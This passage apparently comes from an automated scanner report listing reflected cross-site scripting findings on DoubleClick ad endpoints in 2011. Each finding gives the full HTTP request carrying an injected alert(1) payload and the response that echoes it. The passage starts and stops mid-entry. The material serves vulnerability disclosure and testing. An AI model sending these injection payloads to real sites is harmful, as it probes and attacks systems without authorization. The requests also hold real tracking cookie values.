<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
